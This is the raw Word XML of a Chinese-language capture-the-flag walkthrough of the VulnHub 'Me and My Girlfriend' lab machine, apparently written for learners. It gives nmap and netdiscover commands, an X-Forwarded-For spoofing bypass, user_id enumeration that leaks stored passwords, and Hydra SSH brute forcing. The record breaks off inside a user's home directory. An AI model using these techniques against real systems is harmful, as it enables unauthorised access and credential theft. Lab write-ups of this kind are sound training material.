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C134" w14:textId="5863CE59" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr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2A01CC08" w14:textId="07F0178F" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载链接:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC48A9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00984CCE">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20C479A8" w14:textId="580DCBB6" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>e and my girlfriend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>算是一个比较经典的靶机，新手级别有2个flag。至于介绍有点无聊老套剧情了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7038BC35" w14:textId="244CE8B3" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52B854F5" wp14:editId="286C28BE">
            <wp:extent cx="5274310" cy="1337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DDDD" w14:textId="750CCFF0" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9"/>
    <w:p w14:paraId="07922D17" w14:textId="553891BB" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载好以后是个.</w:t>
      </w:r>
      <w:r>
        <w:t>ova</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4E7240" w14:textId="763B989C" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0933EA01" wp14:editId="78B28E5F">
            <wp:extent cx="2101958" cy="19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52A" w14:textId="0D4BC3CF" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9"/>
    <w:p w14:paraId="2EA3832A" w14:textId="58AEE6D9" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>双击以后选择一个合适的位置存放，记得调回N</w:t>
      </w:r>
      <w:r>
        <w:t>AT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式就可以运行了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB13FFB" w14:textId="48DAF1C4" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D779437" wp14:editId="65C68E3E">
            <wp:extent cx="3029106" cy="2228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B5D" w14:textId="59E925E0" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9"/>
    <w:p w14:paraId="605EEFB2" w14:textId="7E918A01" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9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靶机探测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3068328A" w14:textId="5C31F263" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先用n</w:t>
      </w:r>
      <w:r>
        <w:t>etdiscover</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>探测一波，排除.</w:t>
      </w:r>
      <w:r>
        <w:t>1,.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和.</w:t>
      </w:r>
      <w:r>
        <w:t>254</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以确认靶机I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为192.168.19.144</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032CAEDD" w14:textId="000C6307" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令:</w:t>
      </w:r>
      <w:r>
        <w:t>netdiscover -r 192.168.19.0/16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299CD7BD" w14:textId="763FB2F8" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47EFA01F" wp14:editId="3B45A108">
            <wp:extent cx="4242018" cy="88904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D37A" w14:textId="5761B5F1" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>然后开启N</w:t>
      </w:r>
      <w:r>
        <w:t>MAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫端口,这次只开了22和80端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C06432B" w14:textId="5D7F0EF1" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令:</w:t>
      </w:r>
      <w:r>
        <w:t>nmap -A -sS -sV -v -p- 192.168.19.144</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B933B49" w14:textId="5A8DC3DA" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60C3D24B" wp14:editId="093620FB">
            <wp:extent cx="4724643" cy="125101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237" w14:textId="6375D448" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9"/>
    <w:p w14:paraId="3A5DC152" w14:textId="27612B17" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在浏览器里面输入I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以正常回显</w:t>
      </w:r>
      <w:r w:rsidR="00AD0205">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了个w</w:t>
      </w:r>
      <w:r w:rsidR="00AD0205">
        <w:t>ho are you? Hacker?</w:t>
      </w:r>
      <w:r w:rsidR="00AD0205">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 有点奇怪</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231F6B68" w14:textId="0DC57C2B" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="437D0C84" wp14:editId="1337EC6D">
            <wp:extent cx="4267419" cy="12764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D7F" w14:textId="23CAE554" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9"/>
    <w:p w14:paraId="39CC99CA" w14:textId="273FB0DD" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9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挖掘信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5170E653" w14:textId="2E5007ED" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还是在这个页面由于有点奇怪按住F</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现点新东西,</w:t>
      </w:r>
      <w:r>
        <w:t>Maybe you can search how to use x-forwarded-for</w:t>
      </w:r>
      <w:r w:rsidR="00AD0205">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00AD0205">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提示一波要用到X</w:t>
      </w:r>
      <w:r w:rsidR="00AD0205">
        <w:t>FF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E17F4F0" w14:textId="55BECDAC" w:rsidR="00FC48A9" w:rsidRDefault="00FC48A9" w:rsidP="00FC48A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3249D4EF" wp14:editId="5C525B09">
            <wp:extent cx="2883048" cy="997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1CB" w14:textId="584E2836" w:rsidR="00AD0205" w:rsidRDefault="00AD0205" w:rsidP="00FC48A9"/>
    <w:p w14:paraId="496973B0" w14:textId="4ED76980" w:rsidR="00AD0205" w:rsidRDefault="00AD0205" w:rsidP="00FC48A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么尝试添加X</w:t>
      </w:r>
      <w:r>
        <w:t>FF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经过确认在h</w:t>
      </w:r>
      <w:r>
        <w:t>ost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面添加一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10025">
        <w:t>X-Forwarded-For:127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会让页面跳回到一个正常页面，有登录注册功能</w:t>
      </w:r>
      <w:r w:rsidR="002666BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。为了维持页面正常有两种方法，第一种是用插件添加X</w:t>
      </w:r>
      <w:r w:rsidR="002666BC">
        <w:t>FF</w:t>
      </w:r>
      <w:r w:rsidR="002666BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的头这样想点啥功能就点啥不会弹回到刚开始的w</w:t>
      </w:r>
      <w:r w:rsidR="002666BC">
        <w:t>ho are you?Hacker?</w:t>
      </w:r>
      <w:r w:rsidR="002666BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面。还有另外一种方法是每点一个功能就用burp手动添加这个X</w:t>
      </w:r>
      <w:r w:rsidR="002666BC">
        <w:t>FF</w:t>
      </w:r>
      <w:r w:rsidR="002666BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的头进去</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74705A9B" w14:textId="6AE7B2F8" w:rsidR="00AD0205" w:rsidRDefault="00AD0205" w:rsidP="00FC48A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53474096" wp14:editId="79090A93">
            <wp:extent cx="3384724" cy="99700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C0D0" w14:textId="06EDC1B4" w:rsidR="00AD0205" w:rsidRDefault="00AD0205" w:rsidP="00FC48A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BD59E7E" wp14:editId="5C65C041">
            <wp:extent cx="5274310" cy="14795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B974" w14:textId="50D397A4" w:rsidR="002666BC" w:rsidRDefault="002666BC" w:rsidP="00FC48A9"/>
    <w:p w14:paraId="606D5C1F" w14:textId="4FBF4DE3" w:rsidR="002666BC" w:rsidRDefault="002666BC" w:rsidP="00FC48A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么先尝试注册一个号先</w:t>
      </w:r>
      <w:r>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和p</w:t>
      </w:r>
      <w:r>
        <w:t>assword</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>均为</w:t>
      </w:r>
      <w:r>
        <w:t>helloworld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E808F4D" w14:textId="3CC65582" w:rsidR="002666BC" w:rsidRDefault="002666BC" w:rsidP="00FC48A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32ED79B4" wp14:editId="407C2F4B">
            <wp:extent cx="4540483" cy="146057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2CC7" w14:textId="5713137E" w:rsidR="002666BC" w:rsidRDefault="002666BC" w:rsidP="00FC48A9"/>
    <w:p w14:paraId="11DF9C79" w14:textId="1B6DBFDB" w:rsidR="002666BC" w:rsidRDefault="002666BC" w:rsidP="00FC48A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入完以后抓包可以看到刚才输入的信息，抓包放到sqlmap里面卒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0737166C" w14:textId="5C65F871" w:rsidR="002666BC" w:rsidRDefault="002666BC" w:rsidP="00FC48A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73AC1E63" wp14:editId="57EDC107">
            <wp:extent cx="3892750" cy="13716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69E" w14:textId="0EB00B92" w:rsidR="002666BC" w:rsidRDefault="002666BC" w:rsidP="00FC48A9"/>
    <w:p w14:paraId="12B8873B" w14:textId="6242ABAA" w:rsidR="0096713A" w:rsidRDefault="0096713A" w:rsidP="00FC48A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册完以后回到这里点击一下p</w:t>
      </w:r>
      <w:r>
        <w:t>rofile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C70F36" w14:textId="21760753" w:rsidR="0096713A" w:rsidRDefault="0096713A" w:rsidP="00FC48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03BA04" wp14:editId="019365AB">
            <wp:extent cx="4838949" cy="20448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D06" w14:textId="5750C65A" w:rsidR="002666BC" w:rsidRDefault="002666BC" w:rsidP="00FC48A9"/>
    <w:p w14:paraId="50D64881" w14:textId="77FB4CB2" w:rsidR="0096713A" w:rsidRDefault="0096713A" w:rsidP="00FC48A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>又到了最爱的</w:t>
      </w:r>
      <w:r>
        <w:t>id=xx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环节，尝试丢到sqlmap但是还是跑不出来不知道为啥。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BB62F4" w14:textId="7EBA3AB4" w:rsidR="002666BC" w:rsidRDefault="002666BC" w:rsidP="00FC48A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AD0FC2D" wp14:editId="560D1EB1">
            <wp:extent cx="5274310" cy="2211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F6EA" w14:textId="278F3BA9" w:rsidR="0096713A" w:rsidRDefault="0096713A" w:rsidP="00FC48A9"/>
    <w:p w14:paraId="3CF09544" w14:textId="73D3A547" w:rsidR="0096713A" w:rsidRDefault="0096713A" w:rsidP="0096713A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挖掘漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CFE235" w14:textId="53300411" w:rsidR="0096713A" w:rsidRDefault="0096713A" w:rsidP="0096713A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先分析一波当前的网址</w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00984CCE">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>http://192.168.19.144/index.php?page=profile&amp;user_id=12</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，目前主要的参数是后面的u</w:t>
      </w:r>
      <w:r>
        <w:t>ser_id=xx,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>假如说没有对参数进行任何过滤的话是会存在S</w:t>
      </w:r>
      <w:r>
        <w:t>QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反弹漏洞的，目前sqlmap既然跑不出来从菜鸟的角度来看这条路是行不通的。不过可以从逻辑漏洞入手。已知我们刚注册了一个</w:t>
      </w:r>
      <w:r>
        <w:t>helloworld</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的账号</w:t>
      </w:r>
      <w:r>
        <w:t>userid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为12那前面11个是啥子呢</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7157A42B" w14:textId="26966565" w:rsidR="0096713A" w:rsidRDefault="0096713A" w:rsidP="0096713A"/>
    <w:p w14:paraId="72BCAC67" w14:textId="35EF7914" w:rsidR="0096713A" w:rsidRDefault="0096713A" w:rsidP="0096713A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时如果按住F</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点左上角那个是可以很清楚的看到当前的密码的。所以可能存在</w:t>
      </w:r>
      <w:r w:rsidR="00CB1777">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>越权漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626E005E" w14:textId="3F04D42D" w:rsidR="0096713A" w:rsidRDefault="0096713A" w:rsidP="0096713A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6536E084" wp14:editId="2309F025">
            <wp:extent cx="2787793" cy="136532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902" w14:textId="0E30D038" w:rsidR="00CB1777" w:rsidRDefault="00CB1777" w:rsidP="0096713A"/>
    <w:p w14:paraId="01B0BA8E" w14:textId="73F194A0" w:rsidR="00CB1777" w:rsidRDefault="00CB1777" w:rsidP="0096713A"/>
    <w:p w14:paraId="15DFC36D" w14:textId="5F0708DB" w:rsidR="00CB1777" w:rsidRDefault="00CB1777" w:rsidP="0096713A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里用B</w:t>
      </w:r>
      <w:r>
        <w:t>URP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行抓包把u</w:t>
      </w:r>
      <w:r>
        <w:t>serid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改为11是没有v</w:t>
      </w:r>
      <w:r>
        <w:t>alue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的可能并没有账号存在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F24525" w14:textId="2BEBADA0" w:rsidR="00CB1777" w:rsidRDefault="00CB1777" w:rsidP="0096713A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12885365" wp14:editId="4465B584">
            <wp:extent cx="3105310" cy="1117657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9477" w14:textId="17DB8B6F" w:rsidR="00CB1777" w:rsidRDefault="00CB1777" w:rsidP="0096713A"/>
    <w:p w14:paraId="5C80D70C" w14:textId="57A1AF6C" w:rsidR="00CB1777" w:rsidRDefault="00CB1777" w:rsidP="0096713A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来到9的时候得到一个u</w:t>
      </w:r>
      <w:r>
        <w:t>sername</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和p</w:t>
      </w:r>
      <w:r>
        <w:t>assword abdikasepak dorrrr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C273A3" w14:textId="70D3B7B8" w:rsidR="00CB1777" w:rsidRDefault="00CB1777" w:rsidP="0096713A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C5F0D99" wp14:editId="53133998">
            <wp:extent cx="3257717" cy="95254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6DB" w14:textId="7E83E703" w:rsidR="00CB1777" w:rsidRDefault="00CB1777" w:rsidP="0096713A"/>
    <w:p w14:paraId="25425A3F" w14:textId="3FBC3E5D" w:rsidR="00CB1777" w:rsidRDefault="000A4CE1" w:rsidP="0096713A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以控制变量继续从9到1得到6个账号密码分开装起来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A930C5C" w14:textId="33B15EE9" w:rsidR="000A4CE1" w:rsidRDefault="000A4CE1" w:rsidP="0096713A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16DF22A5" wp14:editId="2B14B9A0">
            <wp:extent cx="3359323" cy="1251014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46A" w14:textId="5F397D0B" w:rsidR="000A4CE1" w:rsidRDefault="000A4CE1" w:rsidP="0096713A"/>
    <w:p w14:paraId="3B7EEE61" w14:textId="2A9BD4D4" w:rsidR="000A4CE1" w:rsidRDefault="000A4CE1" w:rsidP="000A4CE1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爆破S</w:t>
      </w:r>
      <w:r>
        <w:t>SH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20049CD1" w14:textId="49DE66F0" w:rsidR="000A4CE1" w:rsidRDefault="000A4CE1" w:rsidP="000A4CE1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于现在有了一堆账号，登上去以后发现也没有什么传文件的功能点只能把目光返回到22端口那里，尝试利用手中的账号用Hydra爆破成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697DCC37" w14:textId="741FDCED" w:rsidR="000A4CE1" w:rsidRDefault="000A4CE1" w:rsidP="000A4CE1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29931BA8" wp14:editId="60CB6B24">
            <wp:extent cx="4642089" cy="123831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64D7" w14:textId="3FD1E183" w:rsidR="000A4CE1" w:rsidRDefault="000A4CE1" w:rsidP="000A4CE1"/>
    <w:p w14:paraId="71C52A57" w14:textId="410B5602" w:rsidR="000A4CE1" w:rsidRDefault="000A4CE1" w:rsidP="000A4CE1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后用S</w:t>
      </w:r>
      <w:r>
        <w:t>SH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直连成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEF68AF" w14:textId="70816D58" w:rsidR="000A4CE1" w:rsidRDefault="000A4CE1" w:rsidP="000A4CE1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58569587" wp14:editId="65A11A78">
            <wp:extent cx="4603987" cy="112400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BD8F" w14:textId="4C12D96D" w:rsidR="000A4CE1" w:rsidRDefault="000A4CE1" w:rsidP="000A4CE1"/>
    <w:p w14:paraId="0A2C003F" w14:textId="67B39BA1" w:rsidR="000A4CE1" w:rsidRDefault="000A4CE1" w:rsidP="000A4CE1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后c</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到/</w:t>
      </w:r>
      <w:r>
        <w:t>home/alice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下发现一波隐藏目录.</w:t>
      </w:r>
      <w:r>
        <w:t>my_secret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
